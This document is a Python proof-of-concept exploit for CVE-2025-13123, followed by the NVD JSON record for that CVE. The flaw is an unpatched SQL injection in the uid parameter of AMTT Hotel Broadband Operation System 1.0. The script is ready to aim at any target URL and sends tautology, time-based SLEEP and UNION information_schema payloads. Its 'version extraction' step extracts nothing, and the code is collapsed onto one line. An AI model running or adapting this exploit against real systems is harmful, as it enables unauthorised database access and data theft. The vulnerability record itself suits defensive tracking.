CVE-2025-13123

import requests import sys # CVE-2025-13123 SQL Injection PoC # Target: AMTT Hotel Broadband Operation System 1.0 # Vulnerable File: /user/portal/get_firstdate.php # Parameter: uid def exploit_sql_injection(target_url, uid_payload): """ Exploit SQL injection vulnerability in AMTT Hotel System Args: target_url: Base URL of the target system uid_payload: Malicious SQL payload for uid parameter """ # Construct the vulnerable endpoint endpoint = f"{target_url}/user/portal/get_firstdate.php" # Prepare the payload with SQL injection params = { 'uid': uid_payload } try: # Send HTTP GET request with malicious payload response = requests.get(endpoint, params=params, timeout=10) # Check if injection was successful if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Payload: {uid_payload}") print(f"[+] Response length: {len(response.text)}") print(f"[+] Response preview: {response.text[:500]}") return response.text else: print(f"[-] Request failed with status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def extract_database_version(target_url): """ Extract database version using SQL injection """ # Time-based blind SQL injection payload to extract version version_payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1" exploit_sql_injection(target_url, version_payload) def extract_tables(target_url): """ Extract table names from database """ # Union-based SQL injection to extract table names tables_payload = "1' UNION SELECT table_name FROM information_schema.tables WHERE '1'='1" exploit_sql_injection(target_url, tables_payload) if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13123.py <target_url>") print("Example: python cve-2025-13123.py http://target.com") sys.exit(1) target = sys.argv[1].rstrip('/') print("=" * 60) print("CVE-2025-13123 SQL Injection Exploitation") print("Target: AMTT Hotel Broadband Operation System 1.0") print("=" * 60) # Test basic SQL injection basic_payload = "1' OR '1'='1" print("\n[*] Testing basic SQL injection...") exploit_sql_injection(target, basic_payload) # Extract database version print("\n[*] Attempting to extract database version...") extract_database_version(target) # Extract table names print("\n[*] Attempting to extract database tables...") extract_tables(target)

{"cve": {"id": "CVE-2025-13123", "sourceIdentifier": "[email protected]", "published": "2025-11-13T19:15:46.820", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in AMTT Hotel Broadband Operation System 1.0. The impacted element is an unknown function of the file /user/portal/get_firstdate.php. Executing manipulation of the argument uid can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amttgroup:hibos:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AF7B4E54-4BE0-4F4D-915A-600EB71968D7"}]}]}], "references": [{"url": "https://github.com/R178/cve/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332351", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332351", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.683824", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}